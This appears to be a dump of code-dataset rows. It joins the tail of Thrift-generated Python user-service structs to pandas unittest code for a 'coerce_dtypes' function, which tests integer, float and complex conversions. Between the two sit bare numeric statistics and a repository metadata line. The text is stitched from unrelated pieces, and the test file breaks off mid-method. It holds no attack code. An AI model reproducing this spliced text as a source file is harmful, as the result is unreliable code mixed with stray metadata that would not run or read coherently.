      self.u.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # NOTE(review): __dict__.iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class add_user_result:
  """Result struct for add_user().
  Attributes:
   - success: i32 return value (field id 0).
   - e: InvalidValueException raised by the handler (field id 1).
  """
  thrift_spec = (
    (0, TType.I32, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'e', (InvalidValueException, InvalidValueException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.I32:
          self.success = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = InvalidValueException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('add_user_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.I32, 0)
      oprot.writeI32(self.success)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # NOTE(review): __dict__.iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_user_args:
  """Argument struct for get_user().
  Attributes:
   - uid: i32 user id to look up (field id 1).
  """
  thrift_spec = (
    None, # 0
    (1, TType.I32, 'uid', None, None, ), # 1
  )
  def __init__(self, uid=None,):
    self.uid = uid

  def read(self, iprot):
    # Fast path: C-accelerated decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.uid = iprot.readI32();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_user_args')
    if self.uid is not None:
      oprot.writeFieldBegin('uid', TType.I32, 1)
      oprot.writeI32(self.uid)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # NOTE(review): __dict__.iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class get_user_result:
  """Result struct for get_user().
  Attributes:
   - success: User struct return value (field id 0).
   - e: InvalidValueException raised by the handler (field id 1).
  """
  thrift_spec = (
    (0, TType.STRUCT, 'success', (User, User.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'e', (InvalidValueException, InvalidValueException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, e=None,):
    self.success = success
    self.e = e

  def read(self, iprot):
    # Fast path: C-accelerated decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = User()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.e = InvalidValueException()
          self.e.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('get_user_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.e is not None:
      oprot.writeFieldBegin('e', TType.STRUCT, 1)
      self.e.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # NOTE(review): __dict__.iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class clear_list_args:
  """Argument struct for clear_list(); the call carries no fields."""
  thrift_spec = (
  )
  def read(self, iprot):
    # Fast path: C-accelerated decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      else:
        # No declared fields: skip anything the peer sent.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('clear_list_args')
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return

  def __repr__(self):
    # NOTE(review): __dict__.iteritems() is Python 2 only.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
| 29.05082
| 188
| 0.668585
| 2,141
| 17,721
| 5.25362
| 0.066791
| 0.017336
| 0.031206
| 0.060989
| 0.83197
| 0.798453
| 0.779783
| 0.749022
| 0.726262
| 0.71915
| 0
| 0.00359
| 0.21404
| 17,721
| 609
| 189
| 29.098522
| 0.803992
| 0.009762
| 0
| 0.767442
| 1
| 0
| 0.022222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.008457
| 0.012685
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
45da0fdf8d57270d1bbf22d1902ef827d862f813
| 121,867
|
py
|
Python
|
datatube/test/coerce_dtypes_test.py
|
eerkela/archivetube
|
a295987cf4a1234de58c1611fa0f45a626e76c2e
|
[
"MIT"
] | null | null | null |
datatube/test/coerce_dtypes_test.py
|
eerkela/archivetube
|
a295987cf4a1234de58c1611fa0f45a626e76c2e
|
[
"MIT"
] | null | null | null |
datatube/test/coerce_dtypes_test.py
|
eerkela/archivetube
|
a295987cf4a1234de58c1611fa0f45a626e76c2e
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta, timezone
import random
import unittest
import numpy as np
import pandas as pd
from pandas.testing import assert_frame_equal, assert_series_equal
import pytz
if __name__ == "__main__":
from pathlib import Path
import sys
sys.path.insert(0, str(Path(__file__).resolve().parents[2]))
from datatube.dtype import coerce_dtypes
unittest.TestCase.maxDiff = None
class CoerceDtypeBasicTests(unittest.TestCase):
    """Sanity checks on coerce_dtypes that are independent of the
    source/target dtype combination."""

    def test_coerce_dtypes_returns_copy(self):
        # coerce_dtypes must hand back a new object, never mutate input.
        series_in = pd.Series([1, 2, 3])
        series_out = coerce_dtypes(series_in, float)
        self.assertNotEqual(id(series_in), id(series_out))
        frame_in = pd.DataFrame({"copy": [1, 2, 3]})
        frame_out = coerce_dtypes(frame_in, {"copy": float})
        self.assertNotEqual(id(frame_in), id(frame_out))
class CoerceIntegerDtypeTests(unittest.TestCase):
    """Coercion tests starting from integer data, with and without
    missing values, against every supported target type."""

    @classmethod
    def setUpClass(cls) -> None:
        size = 3  # minimum 3
        # integers = [..., -1, 0, 1, ...]
        cls.integers = [-1 * size // 2 + i + 1 for i in range(size)]
        # bool_flags = [1, 0, 1, 0, 1, ...]
        cls.bool_flags = [(i + 1) % 2 for i in range(size)]
        cls.col_name = "integers"

    def _assert_coerced(self, in_data, out_data, target):
        # Coerce `in_data` to `target` and compare with `out_data`,
        # exercising both the Series and the DataFrame code paths.
        result = coerce_dtypes(pd.Series(in_data), target)
        assert_series_equal(result, pd.Series(out_data))
        result = coerce_dtypes(pd.DataFrame({self.col_name: in_data}),
                               {self.col_name: target})
        assert_frame_equal(result, pd.DataFrame({self.col_name: out_data}))

    def _assert_coercion_error(self, in_data, target):
        # Lossy coercions must raise ValueError with the exact library
        # message, for both the Series and the DataFrame code paths.
        in_series = pd.Series(in_data)
        err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                   f"values to {target} without losing information (head: "
                   f"{list(in_series.head())})")
        with self.assertRaises(ValueError) as err:
            coerce_dtypes(in_series, target)
        self.assertEqual(str(err.exception), err_msg)
        in_df = pd.DataFrame({self.col_name: in_data})
        err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                   f"{repr(self.col_name)} to {target} without losing "
                   f"information (head: {list(in_df[self.col_name].head())})")
        with self.assertRaises(ValueError) as err:
            coerce_dtypes(in_df, {self.col_name: target})
        self.assertEqual(str(err.exception), err_msg)

    def test_coerce_from_integer_to_integer_no_na(self):
        self._assert_coerced(self.integers, self.integers.copy(), int)

    def test_coerce_from_integer_to_integer_with_na(self):
        data = self.integers + [None]
        self._assert_coerced(data, data.copy(), int)

    def test_coerce_from_integer_to_float_no_na(self):
        self._assert_coerced(self.integers,
                             [float(i) for i in self.integers], float)

    def test_coerce_from_integer_to_float_with_na(self):
        self._assert_coerced(self.integers + [None],
                             [float(i) for i in self.integers] + [None],
                             float)

    def test_coerce_from_integer_to_complex_no_na(self):
        self._assert_coerced(self.integers,
                             [complex(i, 0) for i in self.integers], complex)

    def test_coerce_from_integer_to_complex_with_na(self):
        self._assert_coerced(self.integers + [None],
                             [complex(i, 0) for i in self.integers] + [None],
                             complex)

    def test_coerce_from_integer_to_string_no_na(self):
        self._assert_coerced(self.integers,
                             [str(i) for i in self.integers], str)

    def test_coerce_from_integer_to_string_with_na(self):
        self._assert_coerced(self.integers + [None],
                             [str(i) for i in self.integers] + [None], str)

    def test_coerce_from_generic_integer_to_boolean_no_na(self):
        # Arbitrary integers cannot be represented as booleans.
        self._assert_coercion_error(self.integers, bool)

    def test_coerce_from_generic_integer_to_boolean_with_na(self):
        self._assert_coercion_error(self.integers + [None], bool)

    def test_coerce_from_integer_bool_flag_to_boolean_no_na(self):
        # 0/1 flags, however, convert losslessly.
        self._assert_coerced(self.bool_flags,
                             [bool(i) for i in self.bool_flags], bool)

    def test_coerce_from_integer_bool_flag_to_boolean_with_na(self):
        self._assert_coerced(self.bool_flags + [None],
                             [bool(i) for i in self.bool_flags] + [None],
                             bool)

    def test_coerce_from_integer_to_datetime_no_na(self):
        expected = [datetime.fromtimestamp(i, tz=timezone.utc)
                    for i in self.integers]
        self._assert_coerced(self.integers, expected, datetime)

    def test_coerce_from_integer_to_datetime_with_na(self):
        expected = [datetime.fromtimestamp(i, tz=timezone.utc)
                    for i in self.integers] + [None]
        self._assert_coerced(self.integers + [None], expected, datetime)

    def test_coerce_from_integer_to_timedelta_no_na(self):
        self._assert_coerced(self.integers,
                             [timedelta(seconds=i) for i in self.integers],
                             timedelta)

    def test_coerce_from_integer_to_timedelta_with_na(self):
        self._assert_coerced(
            self.integers + [None],
            [timedelta(seconds=i) for i in self.integers] + [None],
            timedelta)

    def test_coerce_from_integer_to_object_no_na(self):
        in_series = pd.Series(self.integers)
        self._assert_coerced(in_series, in_series.astype(np.dtype("O")),
                             object)

    def test_coerce_from_integer_to_object_with_na(self):
        in_series = pd.Series(self.integers + [None])
        self._assert_coerced(in_series, in_series.astype(np.dtype("O")),
                             object)
class CoerceFloatDtypeTests(unittest.TestCase):
    """Coercion tests for float-valued data via `coerce_dtypes`.

    Every test exercises both code paths of `coerce_dtypes` — a bare
    Series and a single-column DataFrame — with and without a trailing
    missing value.  The original copy/pasted series/frame assertions are
    factored into the private helpers below; the test method names and
    observable behavior are unchanged.
    """

    @classmethod
    def setUpClass(cls) -> None:
        # Seeded so the random fixtures are reproducible across runs.
        random.seed(12345)
        size = 3  # minimum 3
        cls.whole_floats = [-1 * size // 2 + i + 1.0 for i in range(size)]
        # whole_floats = [..., -1.0, 0.0, 1.0, ...]
        cls.decimal_floats = [-1 * size // 2 + i + 1 + random.random()
                              for i in range(size)]
        # decimal_floats = [..., -1.0 + e, 0.0 + e, 1.0 + e, ...]
        cls.decimal_floats_between_0_and_1 = [random.random()
                                              for _ in range(size)]
        # decimal_floats_between_0_and_1 = [0.xxxx, 0.xxxx, 0.xxxx, ...]
        cls.bool_flags = [(i + 1.0) % 2 for i in range(size)]
        # bool_flags = [1.0, 0.0, 1.0, 0.0, 1.0, ...]
        cls.col_name = "floats"

    # ------------------------------------------------------------------
    # shared helpers (factor out the duplicated series/frame checks)
    # ------------------------------------------------------------------

    def _assert_coerces(self, in_data, out_data, target):
        """Assert `coerce_dtypes` maps `in_data` to `out_data` for both
        the Series and the DataFrame interfaces."""
        # series
        assert_series_equal(coerce_dtypes(pd.Series(in_data), target),
                            pd.Series(out_data))
        # dataframe
        in_df = pd.DataFrame({self.col_name: in_data})
        out_df = pd.DataFrame({self.col_name: out_data})
        assert_frame_equal(coerce_dtypes(in_df, {self.col_name: target}),
                           out_df)

    def _assert_lossy(self, in_data, target):
        """Assert `coerce_dtypes` raises ValueError with the documented
        message for a conversion that would lose information, on both
        the Series and the DataFrame interfaces."""
        # series
        in_series = pd.Series(in_data)
        err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                   f"values to {target} without losing information (head: "
                   f"{list(in_series.head())})")
        with self.assertRaises(ValueError) as err:
            coerce_dtypes(in_series, target)
        self.assertEqual(str(err.exception), err_msg)
        # dataframe
        in_df = pd.DataFrame({self.col_name: in_data})
        err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                   f"{repr(self.col_name)} to {target} without losing "
                   f"information (head: {list(in_df[self.col_name].head())})")
        with self.assertRaises(ValueError) as err:
            coerce_dtypes(in_df, {self.col_name: target})
        self.assertEqual(str(err.exception), err_msg)

    def _assert_object_passthrough(self, in_series):
        """Assert coercion to `object` is equivalent to a plain
        astype(object) for both interfaces."""
        out_series = in_series.astype(np.dtype("O"))
        # series
        assert_series_equal(coerce_dtypes(in_series, object), out_series)
        # dataframe
        in_df = pd.DataFrame({self.col_name: in_series})
        out_df = pd.DataFrame({self.col_name: out_series})
        assert_frame_equal(coerce_dtypes(in_df, {self.col_name: object}),
                           out_df)

    # -- float -> integer --

    def test_coerce_from_whole_float_to_integer_no_na(self):
        self._assert_coerces(self.whole_floats,
                             [int(f) for f in self.whole_floats], int)

    def test_coerce_from_whole_float_to_integer_with_na(self):
        self._assert_coerces(self.whole_floats + [None],
                             [int(f) for f in self.whole_floats] + [None],
                             int)

    def test_coerce_from_decimal_float_to_integer_no_na(self):
        self._assert_lossy(self.decimal_floats, int)

    def test_coerce_from_decimal_float_to_integer_with_na(self):
        self._assert_lossy(self.decimal_floats + [None], int)

    # -- float -> float / complex / string --

    def test_coerce_from_float_to_float_no_na(self):
        self._assert_coerces(self.decimal_floats, self.decimal_floats.copy(),
                             float)

    def test_coerce_from_float_to_float_with_na(self):
        data = self.decimal_floats + [None]
        self._assert_coerces(data, data.copy(), float)

    def test_coerce_from_float_to_complex_no_na(self):
        self._assert_coerces(self.decimal_floats,
                             [complex(f, 0) for f in self.decimal_floats],
                             complex)

    def test_coerce_from_float_to_complex_with_na(self):
        self._assert_coerces(
            self.decimal_floats + [None],
            [complex(f, 0) for f in self.decimal_floats] + [None], complex)

    def test_coerce_from_float_to_string_no_na(self):
        self._assert_coerces(self.decimal_floats,
                             [str(f) for f in self.decimal_floats], str)

    def test_coerce_from_float_to_string_with_na(self):
        self._assert_coerces(self.decimal_floats + [None],
                             [str(f) for f in self.decimal_floats] + [None],
                             str)

    # -- float -> boolean --

    def test_coerce_from_generic_float_to_boolean_no_na(self):
        self._assert_lossy(self.decimal_floats, bool)

    def test_coerce_from_generic_float_to_boolean_with_na(self):
        self._assert_lossy(self.decimal_floats + [None], bool)

    def test_coerce_from_float_bool_flag_to_boolean_no_na(self):
        self._assert_coerces(self.bool_flags,
                             [bool(f) for f in self.bool_flags], bool)

    def test_coerce_from_float_bool_flag_to_boolean_with_na(self):
        self._assert_coerces(self.bool_flags + [None],
                             [bool(f) for f in self.bool_flags] + [None],
                             bool)

    def test_coerce_from_decimal_float_between_0_and_1_to_boolean_no_na(self):
        self._assert_lossy(self.decimal_floats_between_0_and_1, bool)

    def test_coerce_from_decimal_float_between_0_and_1_to_boolean_with_na(self):
        self._assert_lossy(self.decimal_floats_between_0_and_1 + [None], bool)

    # -- float -> datetime / timedelta --

    def test_coerce_from_float_to_datetime_no_na(self):
        self._assert_coerces(
            self.decimal_floats,
            [datetime.fromtimestamp(f, tz=timezone.utc)
             for f in self.decimal_floats], datetime)

    def test_coerce_from_float_to_datetime_with_na(self):
        self._assert_coerces(
            self.decimal_floats + [None],
            [datetime.fromtimestamp(f, tz=timezone.utc)
             for f in self.decimal_floats] + [None], datetime)

    def test_coerce_from_float_to_timedelta_no_na(self):
        self._assert_coerces(
            self.decimal_floats,
            [timedelta(seconds=f) for f in self.decimal_floats], timedelta)

    def test_coerce_from_float_to_timedelta_with_na(self):
        self._assert_coerces(
            self.decimal_floats + [None],
            [timedelta(seconds=f) for f in self.decimal_floats] + [None],
            timedelta)

    # -- float -> object --

    def test_coerce_from_float_to_object_no_na(self):
        self._assert_object_passthrough(pd.Series(self.decimal_floats))

    def test_coerce_from_float_to_object_with_na(self):
        self._assert_object_passthrough(
            pd.Series(self.decimal_floats + [None]))
class CoerceComplexDtypeTests(unittest.TestCase):
    @classmethod
    def setUpClass(cls) -> None:
        """Build the shared complex-valued fixtures once per class.

        NOTE(review): `random.seed(12345)` makes the random draws
        reproducible, and the fixture lists consume the draws in the
        order they are built here — do not reorder these statements.
        """
        random.seed(12345)
        size = 3
        # whole real parts, zero imaginary parts
        cls.real_whole_complex = [complex(-1 * size // 2 + i + 1.0, 0)
                                  for i in range(size)]
        # ^ = [..., complex(-1, 0), complex(0, 0), complex(1, 0), ...]
        # fractional real parts, zero imaginary parts
        cls.real_complex = [complex(-1 * size // 2 + i + 1 + random.random(), 0)
                            for i in range(size)]
        # ^ = [..., complex(-1+e, 0), complex(0+e, 0), complex(1+e, 0), ...]
        cls.real_complex_between_0_and_1 = [complex(random.random(), 0)
                                            for _ in range(size)]
        # ^ = [complex(0.xxxx, 0), complex(0.xxxx, 0), complex(0.xxxx, 0), ...]
        # nonzero imaginary parts (used by the lossy-conversion tests)
        cls.imag_complex = [complex(-1 * size // 2 + i + 1 + random.random(),
                                    -1 * size // 2 + i + 1 + random.random())
                            for i in range(size)]
        # ^ = [..., complex(-1+e,-1+e), complex(0+e,0+e), complex(1+e,1+e), ...]
        # alternating 1/0 pattern, usable as boolean flags
        cls.bool_flags = [complex((i + 1) % 2, 0) for i in range(size)]
        # ^ = [complex(1, 0), complex(0, 0), complex(1, 0), complex(0, 0), ...]
        cls.col_name = "complex"
def test_coerce_from_real_whole_complex_to_integer_no_na(self):
in_data = self.real_whole_complex
out_data = [int(c.real) for c in self.real_whole_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_real_whole_complex_to_integer_with_na(self):
in_data = self.real_whole_complex + [None]
out_data = [int(c.real) for c in self.real_whole_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_real_decimal_complex_to_integer_no_na(self):
in_data = self.real_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_decimal_complex_to_integer_with_na(self):
in_data = self.real_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_integer_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_integer_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_real_complex_to_float_no_na(self):
in_data = self.real_complex
out_data = [c.real for c in self.real_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_real_complex_to_float_with_na(self):
in_data = self.real_complex + [None]
out_data = [c.real for c in self.real_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_imaginary_complex_to_float_no_na(self):
in_data = self.imag_complex
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {float} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, float)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {float} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: float})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_imaginary_complex_to_float_with_na(self):
in_data = self.imag_complex + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {float} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, float)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {float} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: float})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_complex_to_complex_no_na(self):
in_data = self.imag_complex
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_to_complex_with_na(self):
in_data = self.imag_complex + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_to_string_no_na(self):
in_data = self.imag_complex
out_data = [str(c) for c in self.imag_complex]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_to_string_with_na(self):
in_data = self.imag_complex + [None]
out_data = [str(c) for c in self.imag_complex] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_bool_flag_to_boolean_no_na(self):
in_data = self.bool_flags
out_data = [bool(c.real) for c in self.bool_flags]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_complex_bool_flag_to_boolean_with_na(self):
